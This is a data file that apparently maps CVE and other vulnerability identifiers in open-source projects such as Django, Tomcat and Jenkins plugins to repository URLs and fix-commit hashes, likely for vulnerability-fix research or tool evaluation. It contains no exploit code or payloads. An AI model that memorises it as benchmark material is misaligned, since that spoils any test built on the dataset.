-CVE-2020-7695;https://github.com/encode/uvicorn;None:None;False;789e2f135f361d26adda67918fe3f7c4b6ec01b8; -CVE-2018-14574;https://github.com/django/django;None:None;False;a656a681272f8f3734b6eb38e9a88aa0d91806f1; -CVE-2016-1000031;https://github.com/apache/commons-fileupload;None:None;False;02f6b2c4ef9aebf9cf8e55de8b90e73430b69385; -CVE-2020-26215;https://github.com/jupyter/notebook;None:None;False;32bd47068bcd042e7a76f46f3be44d9a59143820; -CVE-2016-1181;https://github.com/kawasima/struts1-forever;None:None;False;eda3a79907ed8fcb0387a0496d0cb14332f250e8; -CVE-2019-16547;https://github.com/jenkinsci/google-compute-engine-plugin;None:None;False;1dfef77f37bf5c005ac02c1bd79e44289b4d7da9; -CVE-2019-10135;https://github.com/containerbuildsystem/osbs-client;None:None;False;dee8ff1ea3a17bc93ead059b9567ae0ff965592c; -CVE-2020-2094;https://github.com/jenkinsci/cloudbees-jenkins-advisor-plugin;None:None;False;f53fe8a41a1566fdd7d2996779f6c5684ef3e2df; -CVE-2017-5662;https://github.com/apache/batik;None:None;False;efb98a96b9b64a557a1caf030e2c16c3902b9712,660ef628d637af636ea113243fe73f170ac43958; -CVE-2015-5607;https://github.com/ipython/ipython;None:None;False;1415a9710407e7c14900531813c15ba6165f0816; -CVE-2020-17516;https://github.com/apache/cassandra;None:None;False;c2f24d2c45aae6030310d881dcd96ba60d04a2ad; -JENKINS-RABBITMQ-PUBLISHER-970;https://github.com/jenkinsci/rabbitmq-publisher-plugin;None:None;False;f0306f229a79541650f759797475ef2574b7c057; -CVE-2019-10427;https://github.com/jenkinsci/aqua-microscanner-plugin;None:None;False;bb44b8637223a7b4e81c04753124d51bb616767a; -CVE-2020-13596;https://github.com/django/django;None:None;False;1f2dd37f6fcefdd10ed44cb233b2e62b520afb3,6d61860b22875f358fac83d903dc62989793481; -CVE-2018-1000112;https://github.com/jenkinsci/mercurial-plugin;None:None;False;54b4f82e80c89d51b12bc64258f6b59e98b0c16a; -CVE-2019-10344;https://github.com/jenkinsci/configuration-as-code-plugin;None:None;False;1c531c1a46fc1da6a82cd728bf66428083d30fef; -CVE-2019-10300;https://github.com/jenkinsci/gitlab-plugin;None:None;False;f028c65539a8892f2d1f738cacc1ea5830adf5d3; -CVE-2016-10320;https://github.com/deanmalmgren/textract;None:None;False;3aff9318001ca2689f58511facf332b12ec5bd72; -CVE-2020-15278;https://github.com/Cog-Creators/Red-DiscordBot;None:None;False;726bfd38adfdfaef760412a68e01447b470f438b; -CVE-2018-16837;https://github.com/ansible/ansible;None:None;False;b618339c321c387230d3ea523e80ad47af3de5c; -CVE-2011-3376;https://github.com/apache/tomcat;None:None;False;d5bd2e6000689c56f0832bf1ff40d9d9d74e4d63; -CVE-2019-1020003;https://github.com/inveniosoftware/invenio-records;None:None;False;361def20617cde5a1897c2e81b70bfadaabae60,4b3f74ead8db36cec6a6b97a77ddd56e0ff30e2,fbebbd9eda8facea81e8e6af45aa7f9932a7ab2; -CERULEAN-001;https://github.com/MD-Studio/cerulean;None:None;False;388b171477f909972d5dc9043ed5fcae4369e3b7; -CVE-2019-3895;https://github.com/openstack/octavia;None:None;False;d7d062a47ab54a540d81f13a0e5f3085ebfaa0d2; -CVE-2020-5236;https://github.com/Pylons/waitress;None:None;False;6e46f9e3f014d64dd7d1e258eaf626e39870ee1f; -WERKZEUG-753;https://github.com/pallets/werkzeug;None:None;False;4baf7f2580aef7040ab4b420690d16084901fd41; -CVE-2012-2138;https://github.com/apache/sling-old-svn-mirror;None:None;False;96e84960ac90e966f0f6cb6d4dfa8046eeeea8a0; -CVE-2019-10305;https://github.com/jenkinsci/xldeploy-plugin;None:None;False;764d328974bb9f6e9619c2315304ec907a6bc5ac; -DJANGO-CA-002;https://github.com/mathiasertl/django-ca;None:None;False;188ec93057b1eebf0bc02056006eabd052f3aad5; -CVE-2018-1199;https://github.com/spring-projects/spring-security;None:None;False;0eef5b4b425ab42b9fa0fde1a3f36a37b92558f; -CVE-2016-1494;https://github.com/sybrenstuvel/python-rsa;None:None;False;ab5d21c3b554f926d51ff3ad9c794bcf32e95b3c; -CVE-2018-20852;https://github.com/python/cpython;None:None;False;4749f1b69000259e23b4cc6f63c542a9bdc62f1; -CVE-2015-5262;https://github.com/apache/httpcomponents-client;None:None;False;6705924879810f617a7a21d34f16b6c0d61e8d34,09027e7286974bf6b61f4106395da2623121db8d,d954cd287dfcdad8f153e61181e20d253175ca8c; -APACHE-AXIS2-5683;https://github.com/apache/axis2-java;None:None;False;1b560264151217dae8b34b6aa4dfff4f51377656; -CVE-2016-1182;https://github.com/kawasima/struts1-forever;None:None;False;eda3a79907ed8fcb0387a0496d0cb14332f250e8; -CVE-2019-3558;https://github.com/facebook/fbthrift;None:None;False;c5d6e07588cd03061bc54d451a7fa6e84883d62b; -CVE-2020-7938;https://github.com/plone/plone.restapi;None:None;False;6f7c08b722c39579d2b7103937f60a1bb450a030; -CVE-2019-1003038;https://github.com/jenkinsci/repository-connector-plugin;None:None;False;9288f0427ef25ec2c62d1c28f5a5c21a3cdd4a7a; -SCRAPY-3415;https://github.com/scrapy/scrapy;None:None;False;8a58d2305f42474e5b054f1b7f13043a7afd9ab6; -CVE-2014-3490;https://github.com/ronsigal/Resteasy.git;None:None;False;9b7d0f574cafdcf3bea5428f3145ab4908fc6d83; -CVE-2020-2091;https://github.com/jenkinsci/ec2-plugin;None:None;False;0cdbaf2d7da5c368209f427559c8608dec22a63b; -CVE-2018-14505;https://github.com/mitmproxy/mitmproxy;None:None;False;7f464b89296881f4d9ec032378c4418e832d17e3; -CVE-2020-17490;https://github.com/saltstack/salt;None:None;False;86e18b91ae006de381f71b972f1daab9239bad3c; -CVE-2018-1002150;https://pagure.io/koji;None:None;False;ab1ade75c155c2325ec92913fc5c510fd61757a1; -CVE-2016-1000111;https://github.com/twisted/twisted;None:None;False;69707bb1aa55b3a6cec5e02df01d34d2a93c2519; -JENKINS-RABBITMQ-PUBLISHER-848;https://github.com/jenkinsci/rabbitmq-publisher-plugin;None:None;False;f0306f229a79541650f759797475ef2574b7c057; -CVE-2017-5650;https://github.com/apache/tomcat;None:None;False;2cb9c724e6a2d15a5bc909c4bf1ab9dfc26fa362,5496e193a89b8b8b3177e516358df2f07ab852b3; -SCAPY-1407;https://github.com/secdev/scapy;None:None;False;905c80d6ed435477224c53de8850f763b04d495d; -CVE-2019-6690;https://github.com/vsajip/python-gnupg;None:None;False;3003b654ca1c29b0510a54b9848571b3ad57df19,39eca266dd837e2ad89c94eb17b7a6f50b25e7cf; -CVE-2018-19787;https://github.com/lxml/lxml;None:None;False;6be1d081b49c97cfd7b3fbd934a193b668629109; -CVE-2019-7164;https://github.com/sqlalchemy/sqlalchemy;None:None;False;30307c4616ad67c01ddae2e1e8e34fabf6028414; -CVE-2014-8650;https://github.com/requests/requests-kerberos;None:None;False;208bebb7008796a07be0204d9b5beaa55d2373ae; -CVE-2020-26244;https://github.com/OpenIDC/pyoidc;None:None;False;62f8d753fa17c8b1f29f8be639cf0b33afb02498; -INDICO-2019-10-1;https://github.com/indico/indico;None:None;False;27dc846bf1c93b80950941e07ac305e4d94ac81,7152d410b86310261ab290e30e351e036f4ea8a; -CVE-2011-0534;https://github.com/apache/tomcat;None:None;False;51640d60c705e57450a105832d91ff4535a96851; -CVE-2019-10308;https://github.com/jenkinsci/analysis-core-plugin;None:None;False;3d7a0c7907d831c58541508b893dcea2039809c5; -CVE-2020-28191;https://github.com/togglz/togglz;None:None;False;ed66e3f584de954297ebaf98ea4a235286784707; -CVE-2021-20180;https://github.com/ansible/ansible;None:None;False;bfea16c4f741d4cd10c8e17bf7eed14240345cb5; -CVE-2009-3695;https://github.com/django/django;None:None;False;e3e992e18b368fcd56aabafc1b5bf80a6e11b495; -CVE-2017-16228;https://github.com/dulwich/dulwich;None:None;False;7116a0cbbda571f7dac863f4b1c00b6e16d6d8d6; -CVE-2018-16168;https://github.com/JPCERTCC/LogonTracer;None:None;False;2bb79861dbaf7e8a9646fcd70359523fdb464d9c; -CVE-2013-2250;https://github.com/apache/ofbiz-framework;None:None;False;c5634799567123b997b6526210e559839741c801; -CVE-2011-4905;https://github.com/apache/activemq;None:None;False;3a71f8e33d0309cb0ca5b5758a8f251da205e757; -CVE-2012-4406;https://github.com/openstack/swift;None:None;False;e1ff51c04554d51616d2845f92ab726cb0e5831a; -CVE-2017-1000504;https://github.com/jenkinsci/jenkins;None:None;False;9b39411b1ae07ce8bf6c7df457bde1c6dabba9f; -CVE-2020-17527;https://github.com/apache/tomcat;None:None;False;21e3408671aac7e0d7e264e720cac8b1b189eb2,8d2fe6894d6e258a6d615d7f786acca80e6020c,d56293f816d6dc9e2b47107f208fa9e95db58c6; -CVE-2019-19118;https://github.com/django/django;None:None;False;092cd66cf3c3e175acce698d6ca2012068d878f,103ebe2b5ff1b2614b85a52c239f471904d2624,36f580a17f0b3cb087deadf3b65eea024f479c2; -CVE-2019-10398;https://github.com/jenkinsci/beaker-builder-plugin;None:None;False;be0101f3541a5d2c28cf226c8b2e55cd4cfc94da; -CVE-2013-2185;https://github.com/apache/tomcat;None:None;False;2a10b5a90e9fadd53eca5a382c2d5feaeb979a37; -CVE-2019-10331;https://github.com/jenkinsci/electricflow-plugin;None:None;False;0a934493290773a953fa7b29c19b555971b1144b; -DJANGO-REST-001;https://github.com/florimondmanca/djangorestframework-api-key;None:None;False;fc51137e056ff3fa3fee7c30f46429f4ab0007c2; -CVE-2019-20907;https://github.com/python/cpython;None:None;False;c55479556db015f48fc8bbca17f64d3e6559855,f3232294ee695492f43d424cc6969d018d49861,79c6b602efc9a906c8496f3d5f4d54c54b48fa0; -CVE-2011-1475;https://github.com/apache/tomcat;None:None;False;885b996773aaffa67822ebec18d69b86d5c47764,eb446820a5cf8e5a2b9d4840933a4e52bb9dd44a; -CVE-2020-2192;https://github.com/jenkinsci/swarm-plugin;None:None;False;4d18f98b00e4c84b152d52346fb9ef1a227b1cf7; -CVE-2019-10354;https://github.com/jenkinsci/jenkins;None:None;False;279d8109eddb7a494428baf25af9756c2e33576b; -CVE-2018-8039;https://github.com/apache/cxf;None:None;False;8ed6208f987ff72e4c4d2cf8a6b1ec9b27575d4; -CVE-2016-10187;https://github.com/kovidgoyal/calibre;None:None;False;3a89718664cb8cce0449d1758eee585ed0d0433c; -SHIFTBOILER-001;https://github.com/projectshift/shift-boiler;None:None;False;11b998e5f5f1ed4a5692aa36d4400693b6d4c93e; -CVE-2020-11977;https://github.com/apache/syncope;None:None;False;2ef69227e8778361e6a87f048bd435220cda9b7d; -CVE-2019-16792;https://github.com/Pylons/waitress;None:None;False;575994cd42e83fd772a5f7ec98b2c56751bd3f65; -CVE-2011-1183;https://github.com/apache/tomcat;None:None;False;de54cec6dfdf375ac5b0a2c59886fa93aca6cdc7; -CVE-2020-29396;https://github.com/odoo/odoo;None:None;False;2be47637dd5cc48ca561ff85cf2d359dde0829a,451cc81a923ecf87298dba88807bb4d3bccfff5,cd32b0c5e6e9fb1ee67a17266eb388be99786f0; -CVE-2018-1000114;https://github.com/jenkinsci/promoted-builds-plugin;None:None;False;9b99b9427cc4f692644f929e70f3e7b2180b11c5; -CVE-2019-14232;https://github.com/django/django;None:None;False;c3289717c6f21a8cf23daff1c78c0c014b94041; -CVE-2019-16546;https://github.com/jenkinsci/google-compute-engine-plugin;None:None;False;df513d57edb86c6844260a7133a0fb97388f5595; -CVE-2015-7337_JUPYTER;https://github.com/jupyter/notebook;None:None;False;9e63dd89b603dfbe3a7e774d8a962ee0fa30c0b; -CVE-2019-10343;https://github.com/jenkinsci/configuration-as-code-plugin;None:None;False;73afe3cb10a723cb06e29c2e5499206aadae3a0d; -CVE-2020-27216;https://github.com/eclipse/jetty.project;None:None;False;53e0e0e9b25a6309bf24ee3b10984f4145701ed,9ad6beb80543b392c91653f6bfce233fc75b9d5,ab27ec3989a71b665532251d03bfed577e26946; -CVE-2009-2625;https://github.com/apache/xerces2-j;None:None;False;0bdf77af1d4fd26ec2e630fb6d12e2dfa77bc12b; -CVE-2016-4000;https://github.com/jythontools/jython;None:None;False;4c337213bd2964bb36cef2d31509b49647ca6f2a; -CVE-2019-10347;https://github.com/jenkinsci/mashup-portlets-plugin;None:None;False;05eb9bfd5c758c8c477ce6bd4315fd65d83e9a0a; -CVE-2017-12617;https://github.com/apache/tomcat;None:None;False;74ad0e216c791454a318c1811300469eedc5c6f3,e76505ba9bb59d9a8b5ae7c103867b00005ac676,bbcbb749c75056a2781f37038d63e646fe972104,cf0b37beb0622abdf24acc7110daf883f3fe4f95,24aea94807f940ee44aa550378dc903289039ddd,a9dd96046d7acb0357c6b7b9e6cc70d186fae663,d5b170705d24c386d76038e5989045c89795c28c,46dfedbc0523d7182be97f4244d7b6c942164485; -CVE-2019-16541;https://github.com/jenkinsci/jira-plugin;None:None;False;3214a54b6871d82cb34a26949aad93b0fa78d1a8; -CVE-2019-10440;https://github.com/jenkinsci/neoload-plugin;None:None;False;83c8300c8318502b4f4d4c802dd2a10cadfee4c9; -CVE-2015-2296;https://github.com/requests/requests;None:None;False;3bd8afbff29e50b38f889b2f688785a669b9aafc; -CVE-2017-7675;https://github.com/apache/tomcat;None:None;False;cf181edc9a8c239cde704cffc3c503425bdcae2b,dacb030b85fe0e0b3da87469e23d0f31252fdede; -BUILDBOT-001;https://github.com/buildbot/buildbot;None:None;False;e159e4ed0a2fee9c7e41e81ae81333b0c9557256; -CVE-2019-9636;https://github.com/python/cpython;None:None;False;c0d95113b070799679bcb9dc49d4960d82e8bb0; -CVE-2021-26118;https://github.com/apache/activemq-artemis;None:None;False;e5566d52116d81611d914548adc3cbb14d7118d4; -CVE-2012-2379;https://github.com/apache/cxf;None:None;False;4500bf901cb2a7312291b6663045f28a95d2a0c4; -CVE-2019-16543;https://github.com/jenkinsci/inflectra-spira-integration-plugin;None:None;False;ce56dce0467afac4537a06bac1c562b0350588ec; -CVE-2011-1419;https://github.com/apache/tomcat;None:None;False;02780bbc6089a12b19d3d5e5dc810455ac6bfe92; -PYCRYPTODOME-001;https://github.com/Legrandin/pycryptodome;None:None;False;f80debf2d26cfd7f30dae95f2b2a893d3a34ee8c; -CVE-2014-3503;https://github.com/apache/syncope;None:None;False;8e0045925a387ee211832c7e0709dd418cda1ad3; -CVE-2018-1000531;https://github.com/inversoft/prime-jwt;None:None;False;abb0d479389a2509f939452a6767dc424bb5e6ba; -CVE-2019-10291;https://github.com/jenkinsci/netsparker-cloud-scan-plugin;None:None;False;cce62d7188f12ab9cf1d5272eb859beb710d521a; -CVE-2020-2095;https://github.com/jenkinsci/redgate-sql-ci-plugin;None:None;False;962f1770eeb1f18dfac91d12461fa6db566e769e; -CVE-2020-7655;https://github.com/hivesolutions/netius;None:None;False;9830881ef68328f8ea9c7901db1d11690677e7d1; -CVE-2019-16551;https://github.com/jenkinsci/gerrit-trigger-plugin;None:None;False;bdc94d3e23df0ad6a64565c732498f89ff743b51; -CVE-2017-18638;https://github.com/graphite-project/graphite-web;None:None;False;71726a0e41a5263f49b973a7b856505a5b931c1f; -CVE-2016-10745;https://github.com/pallets/jinja;None:None;False;9b53045c34e61013dc8f09b7e52a555fa16bed16; -CVE-2019-10337;https://github.com/jenkinsci/token-macro-plugin;None:None;False;004319f1b6e2a0f097a096b9df9dc19a5ac0d9b0; -CVE-2019-1003044;https://github.com/jenkinsci/slack-plugin;None:None;False;0268bbefdcc283effd27be5318770f7e75c6f102; -CVE-2016-10149;https://github.com/rohe/pysaml2;None:None;False;6e09a25d9b4b7aa7a506853210a9a14100b8bc9b; -CVE-2006-0847;https://github.com/cherrypy/cherrypy;None:None;False;7e6187ee19a90ebe7f8597296bfa942cd1eb1864; -CVE-2019-1003020;https://github.com/jenkinsci/kanboard-plugin;None:None;False;01b6e508ccfa26b73974c988a5ba4c7aed9126e9; -ASYNC-HTTP-CLIENT-352;https://github.com/AsyncHttpClient/async-http-client;None:None;False;df6ed70e86c8fc340ed75563e016c8baa94d7e72; -CVE-2019-1003022;https://github.com/jenkinsci/monitoring-plugin;None:None;False;ad99b20cecd1a084d93e707bb29fa9557d2f4382; -CVE-2020-13943;https://github.com/apache/tomcat;None:None;False;1bbc650cbc3f08d85a1ec6d803c47ae53a84f3b,5591143,9d7def0; -CVE-2019-10751;https://github.com/jakubroztocil/httpie;None:None;False;df36d6255df5793129b02ac82f1010171bd8a0a8; -CVE-2016-1000110;https://github.com/python/cpython;None:None;False;17742f2d45c9dd7ca777e33601a26e80576fdbf,436fe5a447abb69e5e5a4f453325c422af02dca,4cbb23f8f278fd1f71dcd5968aa0b3f0b4f3bd5,cde03fa0381fcb7f7d3ba0dff4e784eade1f303; -CVE-2017-2654;https://github.com/jenkinsci/email-ext-plugin;None:None;False;af2cc9bf649781c3c84c6891298db0d8601b193d; -CVE-2020-2110;https://github.com/jenkinsci/script-security-plugin;None:None;False;1a09bdcf789b87c4e158aacebd40937c64398de3; -CVE-2020-17532;https://github.com/apache/servicecomb-java-chassis;None:None;False;839a52e27c754cb5ce14f20063902f21065bd26c; -CVE-2019-0205;https://github.com/apache/thrift;None:None;False;798e90aa8715ed0deff68ef4784926fe2be5c0ea; -PLEXUS-ARCHIVER-87;https://github.com/codehaus-plexus/plexus-archiver;None:None;False;f8f4233508193b70df33759ae9dc6154d69c2ea8; -CVE-2017-5591;https://github.com/poezio/slixmpp;None:None;False;22664ee7b86c8e010f312b66d12590fb47160ad8; -CVE-2019-10446;https://github.com/jenkinsci/vmanager-plugin;None:None;False;639aa135ab57d9e23c5bedeb0a5e9518eb0f486e; -CVE-2020-14019;https://github.com/open-iscsi/rtslib-fb;None:None;False;b23d061ee0fa7924d2cdce6194c313b9ee06c468,dffcf83bead64e959505d64ad587768647caab3a; -DJANGO-REST-6330;https://github.com/encode/django-rest-framework;None:None;False;4bb9a3c48427867ef1e46f7dee945a4c25a4f9b8; -CVE-2020-1734;https://github.com/ansible/ansible;None:None;False;a02641c0202a643c9d70475789e3f0d8261ae2ee; -CVE-2020-2090;https://github.com/jenkinsci/ec2-plugin;None:None;False;0cdbaf2d7da5c368209f427559c8608dec22a63b; -CVE-2020-13956;https://github.com/apache/httpcomponents-client;None:None;False;894234a5aeb9958e7e466c383e4d0ded17a9a81,e628b4c5c464c2fa346385596cc78e035a91a62; -CVE-2018-1000056;https://github.com/jenkinsci/junit-plugin;None:None;False;15f39fc49d9f25bca872badb48e708a8bb815ea7; -CVE-2019-12781;https://github.com/django/django;None:None;False;1e40f427bb8d0fb37cc9f830096a97c36c97af6; -CVE-2016-10075;https://github.com/tqdm/tqdm;None:None;False;7996430e92ca0babec510fcf18d62c9f9c4e6b4d; -CVE-2020-1739;https://github.com/ansible/ansible;None:None;False;1a89d4f059c21a818306a39ada7f5284ae12523,6c74a298702c8bb5532b9600073312e08f39680,c6c4fbf4a1fdea1e10ba94462a60c413990a16a; -413684;https://github.com/eclipse/jetty.project;None:None;False;2f08ba29487aff6624dbf947b1fbd845cdd33464; -TENDENCI-919;https://github.com/tendenci/tendenci;None:None;False;3e37622cac81440c5a1f97c39f112a2cf4a5450c; -HADOOP-14246;https://github.com/apache/hadoop;None:None;False;4dd6206547de8f694532579e37ba8103bafaeb1; -CVE-2014-0012;https://github.com/pallets/jinja;None:None;False;acb672b6a179567632e032f547582f30fa2f4aa7; -CVE-2019-6975;https://github.com/django/django;None:None;False;402c0caa851e265410fbcaa55318f22d2bf22ee2; -CVE-2019-1003045;https://github.com/jenkinsci/ecs-publisher-plugin;None:None;False;e901c02a43bfd41ea1736ba1ed24cb614d821569; -CVE-2021-21266;https://github.com/openhab/openhab-addons;None:None;False;81935b0ab126e6d9aebd2f6c3fc67d82bb7e8b86; -CVE-2016-9909;https://github.com/html5lib/html5lib-python;None:None;False;9b8d8eb5afbc066b7fac9390f5ec75e5e8a7cab7; -CVE-2017-0910;https://github.com/zulip/zulip;None:None;False;960d736e55cbb9386a68e4ee45f80581fd2a4e32; -CVE-2019-16549;https://github.com/jenkinsci/m2release-plugin;None:None;False;1e4d6fee2eab16e7a396b6d3d5f10a87e5c29cc2; -CVE-2019-14233;https://github.com/django/django;None:None;False;52479acce792ad80bb0f915f20b835f919993c7; -CVE-2017-1000395;https://github.com/jenkinsci/jenkins;None:None;False;7b1f8e96a8d97dd09e5e093fcdb010b3295acc77; -CVE-2015-0778;https://github.com/openSUSE/osc;None:None;False;72e38569aec9519a1c80fb0e129187be45abd754; -CVE-2018-8097;https://github.com/pyeve/eve;None:None;False;29e436117ca52cc494465a833ae10d4587dd2755; -CVE-2017-12791;https://github.com/saltstack/salt;None:None;False;6366e05d0d70bd709cc4233c3faf32a759d0173a; -CVE-2019-10367;https://github.com/jenkinsci/configuration-as-code-plugin;None:None;False;322ef83f3200ce6076129c014209ef938e556774; -CVE-2020-17519;https://github.com/apache/flink;None:None;False;b561010b0ee741543c3953306037f00d7a9f0801; -CVE-2016-9243;https://github.com/pyca/cryptography;None:None;False;b924696b2e8731f39696584d12cceeb3aeb2d874; -CVE-2020-24584;https://github.com/django/django;None:None;False;2b099caa5923afa8cfb5f1e8c0d56b6e0e81915,a3aebfdc8153dc230686b6d2454ccd32ed4c9e6,cdb367c92a0ba72ddc0cbd13ff42b0e6df70955; -PDFBOX-3341;https://github.com/apache/pdfbox;None:None;False;c90825da4d28d7b1ae9b1484b9a010206be3dec5,a876be72a827cd38901b71d731392e89836261a0,588ece8d40b81e0e64135fc5a973aa99cc5609d9,fec13c320b201cbf420bc8785a4ac02e6b432385; -CVE-2020-26232;https://github.com/jupyter-server/jupyter_server;None:None;False;61ab548bf9186ab7323d8fa7bd0e12ae23555a28; -CVE-2019-1003033;https://github.com/jenkinsci/groovy-plugin;None:None;False;40777c212d45031324685b54816212299fbe434f; -JENKINS-ACUNETIX-951;https://github.com/jenkinsci/acunetix-plugin;None:None;False;b30c0e2c70df1c0c676a90cb02597e72085335f4; -CVE-2019-10315;https://github.com/jenkinsci/github-oauth-plugin;None:None;False;8d51832643e60c6b60b3280febcdb61c23278989; -CVE-2019-10432;https://github.com/jenkinsci/htmlpublisher-plugin;None:None;False;637aad0308f8cdfb24610041fcfe815d5a1a096b; -CVE-2018-1000068;https://github.com/jenkinsci/jenkins;None:None;False;8830d68f5fe21f344be3496984bc4470bfcd0564; -CVE-2018-8010;https://github.com/apache/lucene-solr;None:None;False;6d082d5743dee7e08a86b3f2ef03bc025112512; -CVE-2020-15110;https://github.com/jupyterhub/kubespawner;None:None;False;3dfe870a7f5e98e2e398b01996ca6b8eff4bb1d0; -CVE-2020-15239;https://github.com/horazont/xmpp-http-upload;None:None;False;82056540191e89f0cd697c81f57714c00962ed75; -CVE-2019-16550;https://github.com/jenkinsci/m2release-plugin;None:None;False;1e4d6fee2eab16e7a396b6d3d5f10a87e5c29cc2; -CVE-2018-10903;https://github.com/pyca/cryptography;None:None;False;d4378e42937b56f473ddade2667f919ce32208cb; -CVE-2019-10400;https://github.com/jenkinsci/script-security-plugin;None:None;False;b28e4dc5584ef6515aeb9bc834691176546d0689; -CVE-2019-19010;https://github.com/ProgVal/Limnoria;None:None;False;3848ae78de45b35c029cc333963d436b9d2f0a35; -CVE-2019-10414;https://github.com/jenkinsci/git-changelog-plugin;None:None;False;305e80d8b0eb9728289c9912c595b5d7a00fd749,356243aa6d3f6ad60f057e7567a3466910618441; -CVE-2017-14735;https://github.com/nahsra/antisamy;None:None;False;82da009e733a989a57190cd6aa1b6824724f6d36; -CVE-2019-9710;https://github.com/marshmallow-code/webargs;None:None;False;a4a228bb58031d1cbe0c4a9b180f44f06b202f76; -CVE-2019-10330;https://github.com/jenkinsci/gitea-plugin;None:None;False;7555cb7c168cfa49d31271e7d65d76c1fab311f7; -CVE-2011-1582;https://github.com/apache/tomcat;None:None;False;2cfe4c0975b9abd80f4557025253ec9987011fe8; -CVE-2020-13957;https://github.com/apache/lucene-solr;None:None;False;8f2f80bbb3c35fef036dce3162f4f03bf465e5f2; -CVE-2019-20529;https://github.com/frappe/frappe;None:None;False;17161976c681c2deadb7a1b84c221ac686c59ee,91f332e92f0cd6742e154926f9794159cbc5575; -CVE-2019-12421;https://github.com/alopresto/nifi;None:None;False;cf6f5172503ce438c6c22c334c9367f774db7b24; -CVE-2015-1772;https://github.com/apache/hive;None:None;False;6929846a8120eaf094b914b4ca8af80b65f891c8; -CVE-2019-14234;https://github.com/django/django;None:None;False;4f5b58f5cd3c57fee9972ab074f8dc6895d8f38; -CVE-2018-6596;https://github.com/anymail/django-anymail;None:None;False;c07998304b4a31df4c61deddcb03d3607a04691; -DJANGONEWSLETTER-001;https://github.com/dokterbob/django-newsletter;None:None;False;bea5a5100cc40717995dafc65ff011bc76696ebd; -CVE-2017-5648;https://github.com/apache/tomcat80;None:None;False;6d73b079c55ee25dea1bbd0556bb568a4247dacd,6bb36dfdf6444efda074893dff493b9eb3648808,dfa40863421d7681fed893b4256666491887e38c,0f7b9465d594b9814e1853d1e3a6e3aa51a21610; -CVE-2018-1000406;https://github.com/jenkinsci/jenkins;None:None;False;c3351d2e7c3edfee82b9470e9aa1168982296072; -CVE-2018-19443;https://github.com/tryton/tryton;None:None;False;8f682ef5ef477fe32dad02bcfdbe4beb6e22c96; -CVE-2019-16789;https://github.com/Pylons/waitress;None:None;False;11d9e138125ad46e951027184b13242a3c1de017; -CVE-2020-7698;https://github.com/Gerapy/Gerapy;None:None;False;e8446605eb2424717418eae199ec7aad573da2d2; -PYRAMID-193;https://github.com/Pylons/pyramid;None:None;False;d0f62591ceb2f6ba6efe98ccf75703e7baee687e; -CVE-2014-0035;https://github.com/apache/cxf;None:None;False;5df3f72f1a26b7c9ac2888ab65e41f4105706580; -CVE-2019-10368;https://github.com/jenkinsci/jclouds-plugin;None:None;False;dd975cc394467c1bbd4d91104094b62157bcfdfc; -CVE-2013-7330;https://github.com/jenkinsci/jenkins.git;None:None;False;36342d71e29e0620f803a7470ce96c61761648d8; -CVE-2017-8109;https://github.com/saltstack/salt;None:None;False;6e34c2b5e5e849302af7ccd00509929c3809c658; -CVE-2020-11995;https://github.com/ebourg/hessian;None:None;False;cf851f5131707891e723f7f6a9718c2461aed826; -CVE-2019-3498;https://github.com/django/django;None:None;False;1cd00fcf52d089ef0fe03beabd05d59df8ea052; -CVE-2020-7694;https://github.com/encode/uvicorn;None:None;False;895807f94ea9a8e588605c12076b7d7517cda503; -CVE-2014-8125;https://github.com/droolsjbpm/drools.git;None:None;False;c48464c3b246e6ef0d4cd0dbf67e83ccd532c6d3; -CVE-2019-16557;https://github.com/jenkinsci/redgate-sql-ci-plugin;None:None;False;18525ee6f01a5bc36040d40f1ff63702ce7280ac; -CVE-2016-4468;https://github.com/cloudfoundry/uaa;None:None;False;215bd349a63edfef15a1aa07a3969c8991e34570,6bf1c0ae1abc9aaba957708e0b2dfb6a70aab826,b384a650a122e42d75e8cbb5624d0274a65cd848; -CONFIDENCE-001;https://github.com/HolmesNL/confidence;None:None;False;c94f3510aabf1d8f67e58ae0d3350c98821d296b; -CVE-2017-16764;https://github.com/illagrenan/django-make-app;None:None;False;acd814433d1021aa8783362521b0bd151fdfc9d2; -CVE-2014-1859;https://github.com/numpy/numpy;None:None;False;961c43da78bf97ce63183b27c338db7ea77bed8; -CVE-2016-9013;https://github.com/django/django;None:None;False;34e10720d81b8d407aa14d763b6a7fe8f13b4f2; -DJANGO-REGISTRATION-001;https://github.com/macropin/django-registration;None:None;False;3a2e0182ff92cc8ce39a932e463cbac37e485afa; -CVE-2020-11652;https://github.com/saltstack/salt;None:None;False;cce7abad9c22d9d50ccee2813acabff8deca35d,d5801df94b05158dc8e48c5e6912b065044720f; -CVE-2020-2231;https://github.com/jenkinsci/jenkins;None:None;False;29c9a8fdeafe26fded955cfba188f50fd4f1786a; -CVE-2019-7722;https://github.com/pmd/pmd;None:None;False;e295711343cc155cb64ea0ae29ce9d69201469b3; -CVE-2019-19911;https://github.com/python-pillow/Pillow;None:None;False;138bd714f5cb2346af71447f7ec52ed54037bc0b; -CVE-2018-8768;https://github.com/jupyter/notebook;None:None;False;e321c80776542b8d6f3411af16f9e21e51e27687; -CVE-2019-10301;https://github.com/jenkinsci/gitlab-plugin;None:None;False;f028c65539a8892f2d1f738cacc1ea5830adf5d3; -APACHE-JSPWIKI-1109;https://github.com/apache/jspwiki;None:None;False;46cd981dfb431730da3f9249f5db858aacf11e52; -CVE-2021-21236;https://github.com/Kozea/CairoSVG;None:None;False;cfc9175e590531d90384aa88845052de53d94bf3; -CVE-2013-1768;https://github.com/apache/openjpa;None:None;False;b8933dc24b84e7e7430ece56bd645d425dd89f24,f4ca597b9a7000a88ad6bbe556283247e9f6bc14,521fecd2d9b91c27e9f90d97e5f5479d17239eb8,01bc0d257b38743372af91cb88269524634db7d3,7f14c7df6b7c7ef42f0671138b9b5dd062fe99aa,ad5cd6fb86af8809b367f709b6e041218055de2f,d3c68ad3bb9aa0e4e9abbfdec691abb06df642a5,4487017fbf57fb7aed4024e0991850bb89fc1c43,87a4452be08b4f97274d0ccfac585ae85841e470; -CVE-2011-4461-JETTY;https://github.com/eclipse/jetty.project;None:None;False;979d6dbbf9416b1a0ad965e2b8a3b11a2d208627,d0b81a185c260ffceecb9d7470b3ddfbfeda4c11; -CVE-2019-10346;https://github.com/jenkinsci/embeddable-build-status-plugin;None:None;False;38e057b71bcd0d494b04215420919abfda93e324; -CVE-2016-8647;https://github.com/ansible/ansible-modules-core;None:None;False;1a6a9ced61bf4ad2519351be53b15126f86f582; -CVE-2014-0095;https://github.com/apache/tomcat;None:None;False;1bd7d414983f2f420dd37e78b5f4686e737dd3e6; -CVE-2019-10411;https://github.com/jenkinsci/inedo-buildmaster-plugin;None:None;False;cef77a827e92718fc89728397e428872fd2518b1; 